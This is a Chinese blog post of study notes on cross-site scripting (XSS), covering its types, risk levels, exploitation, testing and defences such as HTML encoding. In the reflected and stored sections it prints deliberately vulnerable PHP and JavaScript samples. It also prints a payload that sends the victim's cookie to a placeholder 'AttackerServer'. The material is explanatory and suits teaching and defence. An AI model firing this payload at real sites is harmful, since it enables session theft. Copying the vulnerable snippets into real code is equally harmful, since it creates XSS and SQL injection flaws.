1、XSS漏洞

最新推荐文章于 2024-05-17 14:32:46 发布
最新推荐文章于 2024-05-17 14:32:46 发布
阅读量424 收藏 7
点赞数 13
分类专栏: Web漏洞(前端) 文章标签: xss 前端 网络安全 笔记 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74152774/article/details/135921345
版权

XSS漏洞

1、概述

1.1、定义:

跨站脚本攻击漏洞(Cross Site Scripting),为了区别于CSS故而写作XSS。由于网站开发存在缺陷,可允许攻击者通过在Web页面内插入恶意Script代码攻击其他用户的漏洞。

1.2、类型:

  • 反射型
  • 存储型
  • DOM型
  • 反射与dom的区别

1.3、风险等级及危害:

  1. 严重:XSS漏洞构造蠕虫并大面积爆发、通过XSS漏洞获取网站后台权限并可获取webshell 控制服务器。
  2. 中-高危:存储型XSS
  3. 低-中危:反射XSS、DOM XSS

2、漏洞原理+利用

2.1、反射型

网站(例:http://xxx.com/xss.php)存在打印用户输入的功能且未进行防范:

<?php echo $_GET['a'];?>

这时攻击者可以构造:

http://xxx.com/xss.php?a=<script>document.location='http://AttackerServer/getCookie.php?cookie='+document.cookie;</script>

并把这个链接发送给任意用户,当用户点击时,用户的cookie会自动发送到AttackerServer,攻击者便可以利用该cookie登录到用户的账户。

xss漏洞一般都是用来做钓鱼攻击。

2.2、存储型

若网站存在存储型xss漏洞:

<?php
include 'conn.php';
mysql_query("INSERT INTO article VALUES('".$_GET['content']."')");
//......
$result=mysql_query("SELECT content FROM article limit 20");
while ($row = mysql_fetch_array($result)) {
    echo $row['content'];
}
?>

攻击者可以在漏洞点注入恶意js语句对用户进行攻击,例如该漏洞点在某网站的评论区,攻击者在评论区发送了一条恶意的js语句<script>document.location='http://AttackerServer/getCookie.php?cookie='+document.cookie;</script>,网站后台管理员看到时他的cookie就会自动发送到攻击者的http://AttackerServer,若评论审核通过,则凡是看到该评论的用户都会遭受攻击。

2.3、DOM型

网站存在DOM型xss漏洞:

<script> document.write(unescape(window.location.hash)); </script>

3、漏洞挖掘

可以在搜索框、评论区、留言板、个人信息编辑区等地方进行测试,插入简单的js语句(alert(1))进行测试,如成功弹窗,则可以确定存在xss漏洞。
在这里插入图片描述

实际测试中可能需要进行一些绕过。

4、漏洞防御

  1. 纯文本区域,对用户的输入进行htmlencode编码。(例如PHP htmlspecialchars()函数)

htmlencode编码:

编码前编码后
&&amp
&quot
&apos
<&It
>&gt
  1. 富文本区域的过滤十分复杂,可以采用开源库或组建来过滤,设计原则基本上采用设置标签白名单、属性白名单。

PHP可以参考:

XSS过滤引擎1

XSS过滤引擎2

JAVA可以参考:

1

2

DarkByte-
关注
  • 13
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
gnuboard xss漏洞1
08-03
漏洞简介Gnuboard是韩国Sir公司开发一套PHP+Mysql CMS程序。本身数据结构简单,可扩展性能强,程序运行代码与皮肤文件分离,可扩展数据字段多,可
XSS漏洞详解
热门推荐
xcxhzjl的博客
11-18 2万+
一、XSS漏洞原理 XSS,即跨站脚本攻击,是指攻击者利用Web服务器中的应用程序或代码漏洞,在页面中嵌入客户端脚本(通常是一段由JavaScript编写的恶意代码,少数情况下还有ActionScript、VBScript等语言),当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面或打开收到的URL链接时,用户浏览器会自动加载并执行该恶意代码,从而达到攻击的目的。 当应用程序没有对用户提交的内容进行验证和重新编码,而是直接呈现给网站的访问者时,就可能会触发XSS攻击。 二、XSS漏洞的危
XSS漏洞
qq_52725216的博客
02-18 1457
xss攻击
XSS漏洞原理和利用
VictorZhang
08-09 1万+
XSS漏洞原理和利用 1.XSS介绍及原理 XSS又叫CSS(Cross Site Script),跨站脚本攻击。它指的是恶意攻击者往Web页面 里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而 达到恶意的特殊目的。 利用我们所知道的各种黑魔法,向Web页面插入JS代码,让JS代码可以被浏览器执行, 访问该页面的用户则被攻击。 XSS漏洞分类 1.反射型 非存储型...
XSS漏洞个人总结
weixin_46739058的博客
04-26 2579
初级xss攻击思路,绕过
web漏洞-xss漏洞
qq_44312640的博客
11-10 1114
介绍xss漏洞的产生原因、危害、分类、防护,xss平台介绍、beef工具介绍及xss-labs漏洞靶场演示等。
XSS漏洞复现
qq_52016943的博客
07-27 1163
XSS绕过
如何防止XSS漏洞
zyn8823533的博客
02-14 2070
XSS(跨站脚本攻击)是一种攻击方式,攻击者通过注入恶意脚本代码,使得网站上的其他用户在浏览该网站时执行这些脚本代码,从而达到攻击的目的。CSP(内容安全策略):CSP可以限制浏览器中可以执行的代码,通过设置CSP策略,可以限制只允许加载来自特定域名的资源,防止恶意脚本的注入。安全编码:在编写代码时,要使用安全的编码方式,例如对于用户输入的内容,使用htmlentities等转义函数进行处理。需要注意的是,以上方法并不是单独使用的,而是要结合使用,才能有效地防止XSS漏洞
手动挖掘xss漏洞
qq_57307348的博客
02-17 1675
得到
xss漏洞总结
m0_61786761的博客
08-04 508
选择一个xss平台->选择想要的功能生产语句->进行xss攻击得到cookie->用postman工具登录。7.shell箱子反杀:在密码中插入xss,获取箱子后台管理页的cookie->用postman连接。session:会话,存储在服务器,存活时间段,大型网站使用,无法xss盗取。存储型:x=xiaodi->x.php->写入数据库->x.php->回显。dom型:x=xiaodi->本地浏览器静态前端代码->x.php。反射型:x=xiaodi->x.php->回包。6.结合其他漏洞绕过。...
反射型XSS漏洞
fencecat的博客
12-31 8810
实验项目 反射型XSS实验 综合性实验 2020年10月 22日 一、实验综述 1.实验目的及要求 (1)什么是XSS XSS,全称跨站脚本,XSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。 (2)XSS分成两类: 一类是来自内部的,主要指的是利用程序自身的漏洞,构造跨站语句。 另一类则是来自外部的***,主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。 如当我们要一个站点,我们自己构造一个有跨站漏洞的网页...
DedeCMS 存储型xss漏洞1
08-03
Dedecms会员功能shops_delivery.php中的 des 参数存在存储型XSS漏洞,攻击者可利用漏洞获得用户测试环境:DedeCMS-V5.7-U
JSP使用过滤器防止Xss漏洞
10-17
主要为大家详细介绍了JSP使用过滤器防止Xss漏洞,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
Flash XSS漏洞挖掘1
08-03
1. Introduction 2. Vulnerability Analysis Requirement 3. Case Study In Real Worl
XSS实战漏洞挖掘
hmysn的博客
05-11 630
接下来一年时间将会主要研究渗透测试方向的众多问题,文章中的内容也会在后面定期更新。本文主要记录了一些XSS漏洞挖掘中的实用心得和学习笔记
WEB转Flutter基础学习笔记(内含vue和flutter对比)
最新发布
小易不止于搬砖的博客
05-17 671
笔者是一名web前端,记录在转栈flutter时的学习笔记,内涵和vue的对比,能够辅助前端同学更容易理解flutter
vue3.0+antdv的admin管理系统vue-admin-beautiful推荐
独行猫a 的沉淀、积累、总结。天天学习,好好向上...c/c++,嵌入式 linux,Android,HarmonyOS)
05-15 1110
几年前,笔者自学了vue这一优秀的前端框架,但苦于没项目练手,无意间发现了这一优秀的前端集成框架。当时就使用它做了一很有意思的小项目---终端监控云平台,实现了前端和后台的整体功能。整体方案介绍参见博文《》,前端使用vue-admin-beautiful框架,后端使用go-zero微服务框架,几天内就搞出来了一个包含前端和后台的小项目。我的monitor-ui前端运行界面:后续有机会介绍下我这个终端监控云平台小项目的具体实现,挺有意思的。几年前还用到过几个地方的公交客户现场,客户挺喜欢这个功能的。
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
s_sos0的博客
05-14 509
Unable to start ServletWebServerApplicationContext due to missing ServletWeb
xss网站寻找xss漏洞
08-29
- *1* *2* *3* [通过Web安全工具Burp suite找出网站中的XSS漏洞实战(二)](https://blog.csdn.net/weixin_33774308/article/details/88731071)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值